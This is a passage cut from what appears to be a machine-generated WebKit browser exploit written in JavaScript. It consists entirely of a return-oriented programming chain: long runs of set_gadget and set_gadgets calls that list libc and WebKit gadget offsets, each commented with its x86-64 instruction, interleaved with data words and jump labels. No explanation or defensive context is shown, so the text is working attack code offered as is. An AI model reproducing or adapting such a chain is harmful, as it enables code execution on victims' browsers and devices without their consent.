rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+347736, //L7058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+347720, //L7057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7056: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7057: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7058: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+347800, //L7059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7059: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L7061: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+347880, //L7063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7063: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+355680, //L7062 //L7046: libc_base+764760, //pop rsi ropchain+347944, //L7065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7067: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+348064, //L7070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+348048, //L7068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7068: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7070: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+348144, //L7071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+348160, //L7072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7071: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7072: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+348320, //L7076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+348288, //L7074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+348304, //L7075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L7073: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7074: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7075: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7076: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+348376, //L7078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7078: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+348504, //L7080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+348520, //L7081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+348488, //L7079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7079: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7080: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7081: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+348680, //L7085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+348648, //L7083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+348664, //L7084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7082: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7083: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7084: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7085: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+348736, //L7087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+144605 //pop rdi ]); //L7087: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+348864, //L7089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+348880, //L7090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+348848, //L7088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7088: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7089: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7090: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+349040, //L7094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+349008, //L7092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+349024, //L7093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7091: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7094: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+349096, //L7096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7096: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+349224, //L7098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+349240, //L7099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+349208, //L7097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7097: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7098: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7099: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+349320, //L7100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+349336, //L7101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7100: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7101: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+349432, //L7103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+349416, //L7102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7103: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+349512, //L7104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7104: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7105: db([42, 0]); // 0x2a set_gadget(libc_base+144605,); //pop rdi //L7106: db([42, 0]); // 0x2a set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+349656, //L7107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+349688, //L7109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+349672, //L7108 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7107: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7108: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7109: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+349856, //L7111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+349872, //L7112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+349840, //L7110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7110: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7111: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7112: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+349984, //L7114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+350032, //L7117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+350000, //L7115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7114: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7117: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+350144, //L7118+8 libc_base+501454, //add rax, rsi 
libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+350136, //L7118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7118: db([0, 0]); // 0x0 set_gadgets([ ropchain+350160, //L7118+24 ropchain+355680, //L7113 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7119: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7121: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+350296, //L7124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+350280, //L7122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7122: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7124: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+350456, //L7128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+350408, //L7125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+350424, //L7126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7125: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7126: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7127: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L7128: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+350512, //L7129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7131: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+350632, //L7132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+350648, //L7134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7132: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7134: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+350824, //L7137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+350840, //L7138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+350792, //L7135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+350808, //L7136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7135: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7136: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7137: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7138: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+350920, //L7139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+350936, //L7140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7139: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7140: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+351024, //L7141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+351040, //L7143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, 
//mov rax, r8 libc_base+763368 //pop rcx ]); //L7141: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7143: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7144: db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7146: db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+351200, //L7149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+351184, //L7147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7147: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7149: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+351376, //L7152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+351392, //L7153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+351344, //L7150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+351360, //L7151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7150: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7151: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7152: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7153: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+351472, //L7154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+351488, //L7155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+144605 //pop rdi ]); //L7154: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7155: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+351584, //L7157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+351568, //L7156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7156: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7157: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+351664, //L7158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7158: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7159: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7160: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+351808, //L7161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+351840, //L7163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+351824, //L7162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7162: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7163: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi 
ropchain+352016, //L7165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+352032, //L7166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+352000, //L7164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+352144, //L7168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+352192, //L7171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+352160, //L7169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7168: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7169: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7170: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7171: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+352304, //L7172+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+352296, //L7172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7172: db([0, 0]); // 0x0 set_gadgets([ ropchain+352320, //L7172+24 ropchain+354352, //L7167 libc_base+764760, //pop rsi ropchain+352360, //L7173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7173: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L7175: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+352480, //L7178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+352464, //L7176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7178: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+352656, //L7181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+352672, //L7182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+352624, //L7179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+352640, //L7180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7179: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7182: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+352768, //L7184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+352752, //L7183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7183: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7184: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7185: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7186: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L7187: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+352968, //L7189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7189: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+353024, //L7190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+353160, //L7194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+353144, //L7193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7192: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7193: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7194: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+353224, //L7195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7195: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7197: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+353296, 
//L7198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7198: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+353392, //L7200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7200: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7202: db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+353512, //L7205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+353496, //L7203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7203: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7205: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+353688, //L7208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+353704, //L7209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+353656, //L7206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+353672, //L7207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7206: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7207: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7208: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7209: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+353816, 
